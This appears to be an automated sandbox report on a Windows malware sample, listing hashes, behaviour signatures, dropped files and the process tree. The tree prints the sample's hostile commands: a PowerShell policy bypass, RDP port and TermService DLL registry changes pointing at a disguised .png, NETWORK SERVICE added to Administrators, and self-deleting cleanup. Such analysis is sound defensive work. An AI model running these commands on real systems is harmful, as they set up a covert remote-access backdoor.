Analysis
-
max time kernel
34s -
max time network
111s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 21:08
Static task
static1
Behavioral task
behavioral1
Sample
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
Resource
win10v20201028
General
-
Target
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
-
Size
3.8MB
-
MD5
00ae90dd7e86dc9f42dd6df84652122d
-
SHA1
ce09069c7a20d4ac0ce4169a27eab84d3d0e5fdf
-
SHA256
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860
-
SHA512
835808a455f963ffb37bb7d3fabdf7f52f0435b1a4f2e4600148024c25657f4ab579f44c444239d118183365eb8e73820c52fabbf8cb4f49b9372f62633fdee5
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3080 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3080 powershell.exe 3080 powershell.exe 3080 powershell.exe 860 powershell.exe 860 powershell.exe 860 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 3080 powershell.exe 3080 powershell.exe 3080 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 860 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid process target process PID 4700 wrote to memory of 3080 4700 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe powershell.exe PID 4700 wrote to memory of 3080 4700 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe powershell.exe PID 4700 wrote to memory of 3080 4700 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe powershell.exe PID 3080 wrote to memory of 4256 3080 powershell.exe csc.exe PID 3080 wrote to memory of 4256 3080 powershell.exe csc.exe PID 3080 wrote to memory of 4256 3080 powershell.exe csc.exe PID 4256 wrote to memory of 1864 4256 csc.exe cvtres.exe PID 4256 wrote to memory of 1864 4256 csc.exe cvtres.exe PID 4256 wrote to memory of 1864 4256 csc.exe cvtres.exe PID 3080 wrote to memory of 860 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 860 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 860 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 4316 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 4316 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 4316 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 2252 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 2252 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 2252 3080 powershell.exe powershell.exe PID 3080 wrote to memory of 2884 3080 powershell.exe reg.exe PID 3080 wrote to memory of 2884 3080 powershell.exe reg.exe PID 3080 wrote to memory of 2884 3080 powershell.exe reg.exe PID 3080 wrote to memory of 3760 3080 powershell.exe reg.exe PID 3080 wrote to memory of 3760 3080 powershell.exe reg.exe PID 3080 wrote to memory of 3760 3080 powershell.exe reg.exe PID 3080 wrote to memory of 2500 3080 powershell.exe reg.exe PID 3080 wrote to memory of 2500 3080 powershell.exe reg.exe PID 3080 wrote to memory of 2500 3080 powershell.exe reg.exe PID 3080 wrote to memory of 1476 3080 powershell.exe net.exe PID 3080 wrote to memory of 1476 3080 powershell.exe net.exe PID 3080 wrote to memory of 1476 3080 powershell.exe net.exe PID 1476 wrote to memory of 3128 1476 net.exe net1.exe PID 1476 wrote to memory of 3128 1476 net.exe net1.exe PID 1476 wrote to memory of 3128 1476 net.exe net1.exe PID 3080 wrote to memory of 4356 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 4356 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 4356 3080 powershell.exe cmd.exe PID 4356 wrote to memory of 4540 4356 cmd.exe cmd.exe PID 4356 wrote to memory of 4540 4356 cmd.exe cmd.exe PID 4356 wrote to memory of 4540 4356 cmd.exe cmd.exe PID 4540 wrote to memory of 2100 4540 cmd.exe net.exe PID 4540 wrote to memory of 2100 4540 cmd.exe net.exe PID 4540 wrote to memory of 2100 4540 cmd.exe net.exe PID 2100 wrote to memory of 4556 2100 net.exe net1.exe PID 2100 wrote to memory of 4556 2100 net.exe net1.exe PID 2100 wrote to memory of 4556 2100 net.exe net1.exe PID 3080 wrote to memory of 4640 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 4640 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 4640 3080 powershell.exe cmd.exe PID 4640 wrote to memory of 4616 4640 cmd.exe cmd.exe PID 4640 wrote to memory of 4616 4640 cmd.exe cmd.exe PID 4640 wrote to memory of 4616 4640 cmd.exe cmd.exe PID 4616 wrote to memory of 4872 4616 cmd.exe net.exe PID 4616 wrote to memory of 4872 4616 cmd.exe net.exe PID 4616 wrote to memory of 4872 4616 cmd.exe net.exe PID 4872 wrote to memory of 5080 4872 net.exe net1.exe PID 4872 wrote to memory of 5080 4872 net.exe net1.exe PID 4872 wrote to memory of 5080 4872 net.exe net1.exe PID 3080 wrote to memory of 4740 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 4740 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 4740 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 5064 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 5064 3080 powershell.exe cmd.exe PID 3080 wrote to memory of 5064 3080 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe"C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6373.tmp" "c:\Users\Admin\AppData\Local\Temp\x20du4vk\CSCC310646AF3AB4146B951B8DFD7FB7E7E.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
C:\Users\Admin\AppData\Local\Temp\RES6373.tmpMD5
076ad6691cad9f3604f3d2a6f8e27ffb
SHA19ef67ab5ef369eeaec08d07df5adfa4ac07f10cc
SHA256762563c4c9146da8884e6606fa04f96f0143e93fd28bb1655a91788b7034ffa2
SHA51296f35cfe8a7b09480928a0b498414d7de9066997e0a578af901bbddb4bd6ba49b9e1d9142a48ca77707c627d08f36ee7ea5493e9a32f6f828f80e176b11ec216
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
851bf8df96899b2cc50af8047e9fbe5c
SHA1e259d3ea9eabae926f74358b6e8f583cfcb4106b
SHA256b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6
SHA512648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792
-
C:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.dllMD5
837e1973b2d449b32e0f579780d2c5c6
SHA168723961c820a3ba0eb42bf47131472d5d7c97f4
SHA256d9ad449541e07a9fb278111823c4ccff34a3b50a0ebe34f124936e9fc9a77d3e
SHA51293a47aa54685d9fd2887c743135f768e5d424841c67cd84e2660f4f33f722816791554aef6ecb623cbb41035abbc46a78aeb8b41905065a90729857543cac746
-
\??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\CSCC310646AF3AB4146B951B8DFD7FB7E7E.TMPMD5
055814cf745cd28e1dd40ba350a337e4
SHA1961e9bfe0077c70c327571900e3f8089fdb20995
SHA256b0a95bd5edb39f87b5e1c711b10c00dd23f1a50534a9b4e795c3355e4b90dd9c
SHA5120e413449ea5cd15f71944b156696b285a83d3c0ab2c18b868409394730e64daed217d1fcf38a06a4214ad62afe0134b57d17fe16d93cb46a4ea68995c00666b9
-
\??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.cmdlineMD5
51928b31ec8ce992b8ae3aadcf861a6a
SHA18cb8df09edfcb73ca6384662598b14abfd16b090
SHA25691fb461e29cb50a66727902c8422d77db8ef3127558ec7796ce3021006b1eb0b
SHA5128db1e6cb97b5fbbe9b530339f56cfaa1ba3ebeebc3a19bc07c3d769154bd9a3238137d9803afedd2a3a705606b35cee4215f5351081dc84aa06fcb2b3017b732
-
memory/860-44-0x00000000091B0000-0x00000000091B1000-memory.dmpFilesize
4KB
-
memory/860-46-0x0000000009300000-0x0000000009301000-memory.dmpFilesize
4KB
-
memory/860-45-0x0000000009360000-0x0000000009361000-memory.dmpFilesize
4KB
-
memory/860-48-0x00000000092F0000-0x00000000092F1000-memory.dmpFilesize
4KB
-
memory/860-23-0x0000000000000000-mapping.dmp
-
memory/860-43-0x0000000009050000-0x0000000009051000-memory.dmpFilesize
4KB
-
memory/860-35-0x0000000009070000-0x00000000090A3000-memory.dmpFilesize
204KB
-
memory/860-24-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/1476-111-0x0000000000000000-mapping.dmp
-
memory/1864-17-0x0000000000000000-mapping.dmp
-
memory/2100-115-0x0000000000000000-mapping.dmp
-
memory/2252-78-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/2252-77-0x0000000000000000-mapping.dmp
-
memory/2500-110-0x0000000000000000-mapping.dmp
-
memory/2884-108-0x0000000000000000-mapping.dmp
-
memory/3080-0-0x0000000000000000-mapping.dmp
-
memory/3080-6-0x0000000007EF0000-0x0000000007EF1000-memory.dmpFilesize
4KB
-
memory/3080-1-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/3080-13-0x000000000A500000-0x000000000A501000-memory.dmpFilesize
4KB
-
memory/3080-12-0x000000000BF60000-0x000000000BF61000-memory.dmpFilesize
4KB
-
memory/3080-10-0x0000000008750000-0x0000000008751000-memory.dmpFilesize
4KB
-
memory/3080-22-0x00000000093F0000-0x00000000093F1000-memory.dmpFilesize
4KB
-
memory/3080-8-0x0000000008450000-0x0000000008451000-memory.dmpFilesize
4KB
-
memory/3080-7-0x00000000080C0000-0x00000000080C1000-memory.dmpFilesize
4KB
-
memory/3080-21-0x000000000A550000-0x000000000A551000-memory.dmpFilesize
4KB
-
memory/3080-2-0x0000000004F70000-0x0000000004F71000-memory.dmpFilesize
4KB
-
memory/3080-107-0x0000000009B20000-0x0000000009B21000-memory.dmpFilesize
4KB
-
memory/3080-5-0x0000000007F60000-0x0000000007F61000-memory.dmpFilesize
4KB
-
memory/3080-4-0x0000000007CE0000-0x0000000007CE1000-memory.dmpFilesize
4KB
-
memory/3080-133-0x0000000009840000-0x0000000009841000-memory.dmpFilesize
4KB
-
memory/3080-106-0x0000000009510000-0x0000000009511000-memory.dmpFilesize
4KB
-
memory/3080-9-0x00000000088A0000-0x00000000088A1000-memory.dmpFilesize
4KB
-
memory/3080-3-0x0000000007680000-0x0000000007681000-memory.dmpFilesize
4KB
-
memory/3128-112-0x0000000000000000-mapping.dmp
-
memory/3760-109-0x0000000000000000-mapping.dmp
-
memory/4256-14-0x0000000000000000-mapping.dmp
-
memory/4316-51-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/4316-50-0x0000000000000000-mapping.dmp
-
memory/4356-113-0x0000000000000000-mapping.dmp
-
memory/4540-114-0x0000000000000000-mapping.dmp
-
memory/4556-116-0x0000000000000000-mapping.dmp
-
memory/4616-118-0x0000000000000000-mapping.dmp
-
memory/4640-117-0x0000000000000000-mapping.dmp
-
memory/4740-121-0x0000000000000000-mapping.dmp
-
memory/4872-119-0x0000000000000000-mapping.dmp
-
memory/5064-122-0x0000000000000000-mapping.dmp
-
memory/5080-120-0x0000000000000000-mapping.dmp